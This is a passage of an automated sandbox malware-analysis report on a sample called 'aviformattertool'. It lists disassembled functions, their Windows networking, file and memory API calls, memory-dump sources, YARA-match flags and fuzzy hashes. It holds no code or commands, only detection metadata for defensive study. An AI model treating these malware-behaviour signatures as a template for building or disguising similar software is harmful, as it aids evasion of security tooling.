                                                                                                                                                          • WSAStartup.WS2_32(00000002,00000000), ref: 02A11ACB
                                                                                                                                                          • InterlockedExchange.KERNEL32(02A472A4,00000000), ref: 02A11AD7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Interlocked$ExchangeIncrementStartup
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1856147945-0
                                                                                                                                                          • Opcode ID: aec1f8e4fd66f6821269fe13d2ed9323906a72f103e33a6ee2f16cc42a0c785a
                                                                                                                                                          • Instruction ID: b2e6daf17e6c850da0f5c9769cf787a2b46c2032612853f9c5312e20b2a86aeb
                                                                                                                                                          • Opcode Fuzzy Hash: aec1f8e4fd66f6821269fe13d2ed9323906a72f103e33a6ee2f16cc42a0c785a
                                                                                                                                                          • Instruction Fuzzy Hash: 5FD05B719806086BF11066A45D4EA78F71CF706711F500A51FD69C04C0EF50D52485E7
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0040B1BE Relevance: 4.5, APIs: 3, Instructions: 11registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseEventValue
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3274066644-0
                                                                                                                                                          • Opcode ID: acf0347921ab8584f88161ba136fec73ad30cd54a26e5e672ae73256d6149711
                                                                                                                                                          • Instruction ID: 9066e85729a21518be59a5119f1ca61cd5048985b4f02df55d579ce67435f41f
                                                                                                                                                          • Opcode Fuzzy Hash: acf0347921ab8584f88161ba136fec73ad30cd54a26e5e672ae73256d6149711
                                                                                                                                                          • Instruction Fuzzy Hash: A4D0E975844005FFDB055BE0EE4C96D7E79FB04305B154075E203704B5C7351961EB6E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A14C7F Relevance: 3.1, APIs: 2, Instructions: 137COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A14C84
                                                                                                                                                            • Part of subcall function 02A11BA7: __EH_prolog.LIBCMT ref: 02A11BAC
                                                                                                                                                            • Part of subcall function 02A11BA7: RtlEnterCriticalSection.NTDLL ref: 02A11BBC
                                                                                                                                                            • Part of subcall function 02A11BA7: RtlLeaveCriticalSection.NTDLL ref: 02A11BEA
                                                                                                                                                            • Part of subcall function 02A11BA7: RtlEnterCriticalSection.NTDLL ref: 02A11C13
                                                                                                                                                            • Part of subcall function 02A11BA7: RtlLeaveCriticalSection.NTDLL ref: 02A11C56
                                                                                                                                                            • Part of subcall function 02A1E078: __EH_prolog.LIBCMT ref: 02A1E07D
                                                                                                                                                            • Part of subcall function 02A1E078: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A1E0FC
                                                                                                                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 02A14D84
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1927618982-0
                                                                                                                                                          • Opcode ID: 4f66d06d54693330082d6041b5c165acff5e84af370103133789dcefa7c9fa46
                                                                                                                                                          • Instruction ID: 68eeef3bd33f1f0211f270d907ab0d9703407608d8fa659257a1bd93ff8443ca
                                                                                                                                                          • Opcode Fuzzy Hash: 4f66d06d54693330082d6041b5c165acff5e84af370103133789dcefa7c9fa46
                                                                                                                                                          • Instruction Fuzzy Hash: B9512871D042489FDF15DFA8C984AEEFBB5FF09324F14805AE905AB291DB709A04CF90
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A12D39 Relevance: 3.0, APIs: 2, Instructions: 50networkCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • WSASetLastError.WS2_32(00000000), ref: 02A12D47
                                                                                                                                                          • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02A12D5C
                                                                                                                                                            • Part of subcall function 02A1A489: WSAGetLastError.WS2_32(00000000,?,?,02A12A51), ref: 02A1A497
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$Send
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1282938840-0
                                                                                                                                                          • Opcode ID: fc9ce04735ef8d1e6c9919cc1573b9bb5ef370f01215668cf48fa1bfbc5c8c4d
                                                                                                                                                          • Instruction ID: f719d585d6ad92f63697cff415693bd5ed255d49db0e2b42f2144595b3fe5baf
                                                                                                                                                          • Opcode Fuzzy Hash: fc9ce04735ef8d1e6c9919cc1573b9bb5ef370f01215668cf48fa1bfbc5c8c4d
                                                                                                                                                          • Instruction Fuzzy Hash: 540121B5540229AFD7205FA9D98496BBBEDFB453A4B20492EF85993240EF70DD008B61
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A1836A Relevance: 3.0, APIs: 2, Instructions: 32networkCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • WSASetLastError.WS2_32(00000000), ref: 02A18387
                                                                                                                                                          • shutdown.WS2_32(?,00000002), ref: 02A18390
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastshutdown
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1920494066-0
                                                                                                                                                          • Opcode ID: d88c0b01c329883caf738b2c6bd20f8256bd1509824f40daadf008ced23daaf9
                                                                                                                                                          • Instruction ID: 11532e16095606e44f773929bb27bfc1fd0fdfde590ece7a399be600fcfaac2a
                                                                                                                                                          • Opcode Fuzzy Hash: d88c0b01c329883caf738b2c6bd20f8256bd1509824f40daadf008ced23daaf9
                                                                                                                                                          • Instruction Fuzzy Hash: ABF06DB56403298FD7109F58D905B5AB7E5BF08321F044858E96597380DB34A8008BA1
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0040325A Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F81,00000000), ref: 0040326B
                                                                                                                                                            • Part of subcall function 00403112: GetVersionExA.KERNEL32 ref: 00403131
                                                                                                                                                          • HeapDestroy.KERNEL32 ref: 004032AA
                                                                                                                                                            • Part of subcall function 004032B7: HeapAlloc.KERNEL32(00000000,00000140,00403293,000003F8), ref: 004032C4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocCreateDestroyVersion
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2507506473-0
                                                                                                                                                          • Opcode ID: bd4a8705c2f058e6f61ee79851f8c15e955d8a701f491e7a2775f6fe6ed1aa1f
                                                                                                                                                          • Instruction ID: 12b9d923cfd194162cf527058f048946e163d2adb3b2679e6a92d0a0525a53ee
                                                                                                                                                          • Opcode Fuzzy Hash: bd4a8705c2f058e6f61ee79851f8c15e955d8a701f491e7a2775f6fe6ed1aa1f
                                                                                                                                                          • Instruction Fuzzy Hash: BDF065709043015BEF205F316E4A7263EA89B50797F1448BFF501F82D1EB798B90A61A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A151AB Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A151B0
                                                                                                                                                            • Part of subcall function 02A13D7E: htons.WS2_32(?), ref: 02A13DA2
                                                                                                                                                            • Part of subcall function 02A13D7E: htonl.WS2_32(00000000), ref: 02A13DB9
                                                                                                                                                            • Part of subcall function 02A13D7E: htonl.WS2_32(00000000), ref: 02A13DC0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: htonl$H_prologhtons
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4039807196-0
                                                                                                                                                          • Opcode ID: 585a2d256c4e70823b8c4fc98be78b0dbd3f1448cfc6ccdb44475f7fc2820632
                                                                                                                                                          • Instruction ID: 71f7a5b4c36b5ed959bbe50cf012aae594a7d230b21c2b0097722111b50c37b2
                                                                                                                                                          • Opcode Fuzzy Hash: 585a2d256c4e70823b8c4fc98be78b0dbd3f1448cfc6ccdb44475f7fc2820632
                                                                                                                                                          • Instruction Fuzzy Hash: 8F813B75D0124E8ECF05DFA8D190AEEFBB5EF88324F14819AD850B7240EB759A05CFA4
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A4EB32 Relevance: 1.7, APIs: 1, Instructions: 192fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • WriteFile.KERNELBASE(0E23C226), ref: 02AAC06A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A4A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A4A000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a4a000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                          • Opcode ID: b7db2c2ac1ebf4b557d7b054757339eb87fe76113f7320a8df8ba04dcb67e7b4
                                                                                                                                                          • Instruction ID: 548e9f7a37b913d1eccb6d394bebbee28579ba9529a9aedb404a9c02f01096d6
                                                                                                                                                          • Opcode Fuzzy Hash: b7db2c2ac1ebf4b557d7b054757339eb87fe76113f7320a8df8ba04dcb67e7b4
                                                                                                                                                          • Instruction Fuzzy Hash: 9251CDB250C6049FE7117E19DC857BABBE5EF94720F16492DDBC483740EA365800CADB
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A4F75A Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SHGetSpecialFolderPathA.SHELL32 ref: 02A53570
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A4A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A4A000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a4a000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FolderPathSpecial
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 994120019-0
                                                                                                                                                          • Opcode ID: 0de91904f875396da940f63f84f80259b4f75a562933b93f10d5f0b9d7500b74
                                                                                                                                                          • Instruction ID: b05c20ce5de7ea8a7449b301654f6c690412c4d1bbc743f152ace5c7e8a23809
                                                                                                                                                          • Opcode Fuzzy Hash: 0de91904f875396da940f63f84f80259b4f75a562933b93f10d5f0b9d7500b74
                                                                                                                                                          • Instruction Fuzzy Hash: C321DFF250C604AFE715AE09DC81BBAFBE9EF98710F06482DE7C5C3750EA3595408A97
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A1E941 Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A1E946
                                                                                                                                                            • Part of subcall function 02A11A01: TlsGetValue.KERNEL32 ref: 02A11A0A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: H_prologValue
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3700342317-0
                                                                                                                                                          • Opcode ID: f2ba65603c1815a65e7883aba12c4b4b72a56d7f48ac62cde80eeb0e63e414cc
                                                                                                                                                          • Instruction ID: efb917875f7a6f18d6b10bb1f2432b7df899546cfd40c4a926cb1dd7b3165373
                                                                                                                                                          • Opcode Fuzzy Hash: f2ba65603c1815a65e7883aba12c4b4b72a56d7f48ac62cde80eeb0e63e414cc
                                                                                                                                                          • Instruction Fuzzy Hash: 63212FB2D04209AFDB04DFA4D640AFEFBF9EF48320F14452AE915E7240DB71A900CBA5
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A8D36C Relevance: 1.6, APIs: 1, Instructions: 73fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A4A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A4A000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a4a000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                          • Opcode ID: 0bc2c6600c418b448beca4cffd0f036102c75a16f61f4e99a8c066ae26431e0b
                                                                                                                                                          • Instruction ID: 14dc635bf23f92f3e08999449be48497a198eab6eef5213938023c5798c99035
                                                                                                                                                          • Opcode Fuzzy Hash: 0bc2c6600c418b448beca4cffd0f036102c75a16f61f4e99a8c066ae26431e0b
                                                                                                                                                          • Instruction Fuzzy Hash: E22135F250C6009FE7057F19EC8667AFBE4EF48710F06092DE6D483740EA3559548A97
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A4EB7C Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • WriteFile.KERNELBASE(0E23C226), ref: 02AAC06A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A4A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A4A000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a4a000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                          • Opcode ID: 5e7c3d362560834089696c6783bf291c3aad70a685fff77120f906b8794acb46
                                                                                                                                                          • Instruction ID: d27bc725ef4ab5fa15be7b071a3d23b453b931f750ce60e949ed156c733eb35b
                                                                                                                                                          • Opcode Fuzzy Hash: 5e7c3d362560834089696c6783bf291c3aad70a685fff77120f906b8794acb46
                                                                                                                                                          • Instruction Fuzzy Hash: F72118F251CA109FE7167F09D8857BAFBE5EF44710F06882DD6C443644EA3158448BDB
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A133B2 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02A133CC
                                                                                                                                                            • Part of subcall function 02A132AB: __EH_prolog.LIBCMT ref: 02A132B0
                                                                                                                                                            • Part of subcall function 02A132AB: RtlEnterCriticalSection.NTDLL(?), ref: 02A132C3
                                                                                                                                                            • Part of subcall function 02A132AB: RtlLeaveCriticalSection.NTDLL(?), ref: 02A132EF
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1518410164-0
                                                                                                                                                          • Opcode ID: d86364dee049d19d39da66d53fd91549b1020d7264834ba759d98fca12cd8a37
                                                                                                                                                          • Instruction ID: 2c78da396ff5b29a5ae0556ec214641cffd12c3ddce8ecd19401ff316f4004f0
                                                                                                                                                          • Opcode Fuzzy Hash: d86364dee049d19d39da66d53fd91549b1020d7264834ba759d98fca12cd8a37
                                                                                                                                                          • Instruction Fuzzy Hash: 43018070214606AFDB08DF59D886F55FBA9FF45330B10835AE828872C0EF30E821CBA4
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00402EAE Relevance: 1.5, APIs: 1, Instructions: 46memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,00000000,00402E92,000000E0,00402E7F,?,00404853,00000100,?,00000000), ref: 00402F1A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                          • Opcode ID: 66789356bd00888105a6c91ff4dfb52d8ecebb81d0bee222744b9891a63f8538
                                                                                                                                                          • Instruction ID: 765fdeebac85905f4101f829938394dd68b44c118b6f92374405937e6060d87d
                                                                                                                                                          • Opcode Fuzzy Hash: 66789356bd00888105a6c91ff4dfb52d8ecebb81d0bee222744b9891a63f8538
                                                                                                                                                          • Instruction Fuzzy Hash: 08F0F43290422256EA20A714BF887C77364EB107B4F1A0537FE41BB2D0C3B8EC91A2CD
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A4EC4E Relevance: 1.5, APIs: 1, Instructions: 44fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • WriteFile.KERNELBASE(0E23C226), ref: 02AAC06A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A4A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A4A000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a4a000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                          • Opcode ID: e49162da47c81d544e921baec42112d21d719c3d29f06b2d208218029d9b3b4d
                                                                                                                                                          • Instruction ID: 2a7d09d4cf723c53031b8b07ca49b78c4a7cae1579e0cc9925ff02089dd15919
                                                                                                                                                          • Opcode Fuzzy Hash: e49162da47c81d544e921baec42112d21d719c3d29f06b2d208218029d9b3b4d
                                                                                                                                                          • Instruction Fuzzy Hash: 2601D6F151CA009FE3067F19E8867BAFBE1EF94710F02882DE2C586A44DA344445CB9B
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A1E4D1 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A1E4D6
                                                                                                                                                            • Part of subcall function 02A126DB: RtlEnterCriticalSection.NTDLL(?), ref: 02A12706
                                                                                                                                                            • Part of subcall function 02A126DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02A1272B
                                                                                                                                                            • Part of subcall function 02A126DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02A35AD3), ref: 02A12738
                                                                                                                                                            • Part of subcall function 02A126DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02A12778
                                                                                                                                                            • Part of subcall function 02A126DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02A127D9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4293676635-0
                                                                                                                                                          • Opcode ID: c4b8c598c92b0edbf11c0d35cb929f56578ba083bee5c24db1190ab42bb75ab3
                                                                                                                                                          • Instruction ID: b82d937f6e322ba7613e49c8d87c9f43575e69ec97dfcbf6675536568bee63ee
                                                                                                                                                          • Opcode Fuzzy Hash: c4b8c598c92b0edbf11c0d35cb929f56578ba083bee5c24db1190ab42bb75ab3
                                                                                                                                                          • Instruction Fuzzy Hash: 7F01D0B5900B04DFC319CF1AC240986FBF4EF88310B01C5AEA4498B321EB70EA40CF90
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A81776 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE ref: 02AAC075
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A4A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A4A000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a4a000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ChangeCloseFindNotification
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2591292051-0
                                                                                                                                                          • Opcode ID: e6ecbe794ec6ca7fe2b5c9fda27a156c322041baea3b08f004f550512f756606
                                                                                                                                                          • Instruction ID: d80ca1c33a801c004810e36a0cff388fdd8424e6cfa8fa35780ea0ff522ad328
                                                                                                                                                          • Opcode Fuzzy Hash: e6ecbe794ec6ca7fe2b5c9fda27a156c322041baea3b08f004f550512f756606
                                                                                                                                                          • Instruction Fuzzy Hash: 88F012B204C204EFE3156A54EC86BFAF7E9EB19325F01091DE7D182540D73594008657
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A1E2B0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A1E2B5
                                                                                                                                                            • Part of subcall function 02A23ACC: _malloc.LIBCMT ref: 02A23AE4
                                                                                                                                                            • Part of subcall function 02A1E4D1: __EH_prolog.LIBCMT ref: 02A1E4D6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: H_prolog$_malloc
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4254904621-0
                                                                                                                                                          • Opcode ID: da89291ef7021c37cd7e282c3f2e491bfbac21c6afb979102bdf22e056934fba
                                                                                                                                                          • Instruction ID: 60da4e246801560c4210a593143c177ec36ca9502da19e7d100be5b9fc782f1d
                                                                                                                                                          • Opcode Fuzzy Hash: da89291ef7021c37cd7e282c3f2e491bfbac21c6afb979102bdf22e056934fba
                                                                                                                                                          • Instruction Fuzzy Hash: 3EE0C2B1E40209ABCF0DDF68DA1176EB7A6FB08300F0045BDBC09D2740DF7189008A04
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A233D2 Relevance: 1.5, APIs: 1, Instructions: 19COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 02A25BDA: __getptd_noexit.LIBCMT ref: 02A25BDB
                                                                                                                                                            • Part of subcall function 02A25BDA: __amsg_exit.LIBCMT ref: 02A25BE8
                                                                                                                                                            • Part of subcall function 02A23413: __getptd_noexit.LIBCMT ref: 02A23417
                                                                                                                                                            • Part of subcall function 02A23413: __freeptd.LIBCMT ref: 02A23431
                                                                                                                                                            • Part of subcall function 02A23413: RtlExitUserThread.NTDLL(?,00000000,?,02A233F3,00000000), ref: 02A2343A
                                                                                                                                                          • __XcptFilter.LIBCMT ref: 02A233FF
                                                                                                                                                            • Part of subcall function 02A28D14: __getptd_noexit.LIBCMT ref: 02A28D18
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1405322794-0
                                                                                                                                                          • Opcode ID: 0170118c9d098eb9ed67f0ebb73d2c527628bc6cbdb97c9e347cf4b9dc343f56
                                                                                                                                                          • Instruction ID: db54fdf27b37439c996f0ee8817efef63e1fe1425c6186f1fab0cf8b3eb1c7bb
                                                                                                                                                          • Opcode Fuzzy Hash: 0170118c9d098eb9ed67f0ebb73d2c527628bc6cbdb97c9e347cf4b9dc343f56
                                                                                                                                                          • Instruction Fuzzy Hash: 1DE0E6B5D806119FEB08ABA4D905F2D7766EF45315F200088F1015B160DE7899449F30
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

